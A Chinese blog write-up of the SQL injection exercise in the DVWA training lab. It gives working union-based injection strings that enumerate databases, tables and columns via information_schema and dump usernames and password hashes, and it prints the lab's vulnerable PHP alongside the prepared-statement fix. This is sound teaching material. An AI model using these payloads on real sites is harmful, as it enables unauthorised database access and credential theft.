DVWA之SQL注入

最新推荐文章于 2024-05-12 12:01:50 发布
最新推荐文章于 2024-05-12 12:01:50 发布
阅读量1.7k 收藏 6
点赞数 3
分类专栏: DVWA靶场 文章标签: sql php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51683653/article/details/127077380
版权

目录

1、级别:Low

1.1 寻找注入点

1.2 判断类型及闭合方式

 1.3 验证漏洞

 1.4 判断列数及回显位

1.5 获取数据

 2、级别:Medium

 2.1 查看闭合方式

 2.2 验证漏洞

 2.3 判断列数及回显位

 2.4 获取数据

3、级别:High

 4、级别:Impossible

1、级别:Low

1.1 寻找注入点

 这里很明显就是id

1.2 判断类型及闭合方式

判断注入点是数字型还是字符型

  输入1asdf无报错,说明为字符型,我们再输入1、2、3等数字,发现能够正常显示

 输入1',页面报错,说明该处为单引号闭合方式

字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合。 

Sql注入的分类:数字型+字符型 - LxRo_UX - 博客园

 1.3 验证漏洞

输入1' and 1#,能够正常显示信息

输入1' and 0#,无显示

可以证明存在漏洞

查看源代码

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            mysqli_close($GLOBALS["___mysqli_ston"]);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
            #$sqlite_db_connection->enableExceptions(true);

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    } 
}

?>

可以看到sql语句为   SELECT first_name, last_name FROM users WHERE user_id = '$id' 

 1.4 判断列数及回显位

通过order by看当前表中存在多少列,ORDER BY 语句用于根据指定的列对结果集进行排序。可以这么理解,如访问id=1 order by 3,页面返回与id=1相同的结果,输入id=1 order by 4,页面返回与id=1不同的结果,则字段数为3。

输入1' order by 3,出现报错,说明列数小于3

 输入1' order by 2,无报错,说明列数为2

 输入1' union select 1,2#,查看回显位

 

 我们可以通过回显位来得到自己想要的数据

1.5 获取数据

注:mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。

1、SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段
SCHEMA_NAME,这个表中记录了数据库库名。

2、TABLES表存储用户创建的所有数据库 库名和表名,字段分别为:
TABLES_SCHEMA和TABLES_NAME。

3、COLUMNS表中存储用户创建的所有数据库的库名、表名、字段名,字段名分别为:
TABLE_SCHEMA、TABLE_NAME、COLUMN_NAME.
 

获取数据库名:1' union select 1,database()#  (可以看到数据库名为dvwa)

 获取表名:1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa')#   (表名分别为guestbook、users)

 获取列名:1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users')# 

 获取字段值:1’ union Select user,password from users#

 我们以admin账户为例,解密得到密码

 2、级别:Medium

这里只有5个选项供我们选择,无法用输入框进行sql注入

我们使用bp进行抓包 

 如果发现127.0.0.1无法使用bp抓包,可以用win+R输入cmd,在输入ipconfig命令查看自己的IP地址,将127.0.0.1改为本地ip地址就可以使用bp成功抓包啦!

 2.1 查看闭合方式

把id=1改为id=1' ,页面报错 

 输入id=1''试试,同样报错,单引号被转义了

 我们输入id=1asdf,有报错说明注入点为数字型,无闭合

 2.2 验证漏洞

输入id=1 and 1#

 输入id=1 and 0#,证明漏洞存在

 2.3 判断列数及回显位

同上,我们能够判断列数仍然为2

 查看回显位

 2.4 获取数据

库名:id=1 union select 1,database()#

 表名:id=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())#

 这里的单引号被转义了,所以我们无法使用table_schema='dvwa',我们用table_schema=database()进行代替

 列名:id=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273)#

0x7573657273是users的十六进制ascii码

 字段值:id=1 union Select user,password from users#

 

3、级别:High

改成了链接?点进去看看

 

 好像除了在新的窗口输入之外和low级别没有什么区别(应该就是为了防止bp抓包)

 获取数据库名

 表名

 列名

 字段值

 4、级别:Impossible

直接查看源代码

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        $id = intval ($id);
        switch ($_DVWA['SQLI_DB']) {
            case MYSQL:
                // Check the database
                $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
                $data->bindParam( ':id', $id, PDO::PARAM_INT );
                $data->execute();
                $row = $data->fetch();

                // Make sure only 1 result is returned
                if( $data->rowCount() == 1 ) {
                    // Get values
                    $first = $row[ 'first_name' ];
                    $last  = $row[ 'last_name' ];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
                break;
            case SQLITE:
                global $sqlite_db_connection;

                $stmt = $sqlite_db_connection->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;' );
                $stmt->bindValue(':id',$id,SQLITE3_INTEGER);
                $result = $stmt->execute();
                $result->finalize();
                if ($result !== false) {
                    // There is no way to get the number of rows returned
                    // This checks the number of columns (not rows) just
                    // as a precaution, but it won't stop someone dumping
                    // multiple rows and viewing them one at a time.

                    $num_columns = $result->numColumns();
                    if ($num_columns == 2) {
                        $row = $result->fetchArray();

                        // Get values
                        $first = $row[ 'first_name' ];
                        $last  = $row[ 'last_name' ];

                        // Feedback for end user
                        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                    }
                }

                break;
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti-CSRFtoken机制的加入了进一步提高了安全性。

PHP 数据对象 (PDO) 扩展为PHP访问数据库定义了一个轻量级的一致接口。

PDO 提供了一个数据访问抽象层,这意味着,不管使用哪种数据库,都可以用相同的函数(方法)来查询和获取数据。

Dvwa之SQL 注入全级别学习笔记-IT Blog

RexHarrr
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
DVWA-SQL 详细教学
cc菜的一批
12-05 4470
一、SQL注入原理 利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,这是SQL注入的标准释义。 二、手工注入思想流程 1、判断是否存在注入点 2、是数字型注入,还是字符型注入 3、判断字段数 4、判断回显位置 5、获取数据库名 6、获取表名 7、获取字段名 8、得到数据 三、开始手工sql注入 难度等级 注入方式 提交方式 low 字符型 get 尝试输...
DVWA-----SQL Injection(SQL手工注入)
m0_65712192的博客
11-21 5750
DVWA-----SQL Injection(SQL手工注入)
DVWA通过攻略之SQL注入_dvwa sql注入(1)
最新发布
2401_84968303的博客
05-12 1055
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA SQL注入
m0_55605024的博客
03-01 482
简而言之,是在输入字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些。如:将'dvwa'替换为database() or 替换为0x64767761(将'dvwa'进行16进制编码)2.安装kali操作系统,kali自带sqlmap,可以直接输入sqlmap执行。注入进去的恶意指令就会被数据库误以为是正常的SQL指令而运行。--dbs:database serve 获取所有的数据库名。database():返回当前数据库的名称。防御命令执行的最高效的方法,就是。
DVWA平台搭建+SQL注入实验详解
二狗的博客
04-04 5470
实现DVWA平台的搭建,为后续的SQL注入提供练习环境;进行SQL注入的练习,目的是了解因web应用程序对用户输入数据的合法性没有判断或过滤不严,而造成的危害,以便后续更好地掌握对其的防御手段,提高网络安全意识;
DVWA靶场之SQL注入通关详解(1),2024年最新赶紧学起来
weixin_58134620的博客
04-17 772
接下来查询表名,查询语句为:1 union select 1,table_name from information_schema.tables where table_schema=database()#。通常,SQL注入攻击的目标是Web应用程序,因为Web应用程序通常需要与数据库进行交互,并且大多数Web应用程序使用的是SQL语言。接下来判断字段数,当查询语句为1 or 1=1 order by 2时,页面能正常显示,但是当把2换成3时,页面就会报错,因此这里的字段数为2。没有进行敏感字符过滤。
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA通过攻略之SQL注入
勿山几已
05-24 8037
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWA——SQL注入
qq_62803993的博客
01-08 2422
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本中存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
DVWA-------简单的SQL注入
热门推荐
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
DVWA下的SQL注入
07-25
SQL
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
学习之sql注入漏洞网址的创建
06-06
学习sql注入,往往需要一个可注入的网址,这篇文章很好的解决了这个问题,我们可以自己创建一个自己用的地址来学习,可以让我们为所欲为。
2.SQL注入.md
05-31
玄魂磐石计划课程陈殷课件 常用SQL注入操作,基于DVWA漏洞系统源码分析 --------------------------------- md文件
DVWA靶场中SQL注入
剁椒鱼头没剁椒的博客
12-13 5764
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入。
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 5523
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
dvwasql注入(低级)
12-21
DVWA(Damn Vulnerable Web Application)是一个用于学习和测试Web应用程序安全的漏洞测试平台。其中包含了不同级别的漏洞,包括SQL注入SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。 在DVWA中进行SQL注入(低级)的操作如下: 1. 打开DVWA平台并登录。 2. 在左侧导航栏中选择"SQL Injection"。 3. 在"SQL Injection"页面中,选择"Low"级别。 4. 在页面上方的输入框中输入一个单引号(')并点击"Submit"按钮。 5. 页面将显示一个错误消息,表明存在SQL注入漏洞。 6. 在输入框中输入以下内容并点击"Submit"按钮: ``` 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# ``` 这个语句将获取当前数据库中所有表的名称。 7. 页面将显示一个包含表名的结果集。 通过以上步骤,你可以在DVWA平台上进行SQL注入(低级)的操作,并获取数据库中的表名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RexHarrr

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值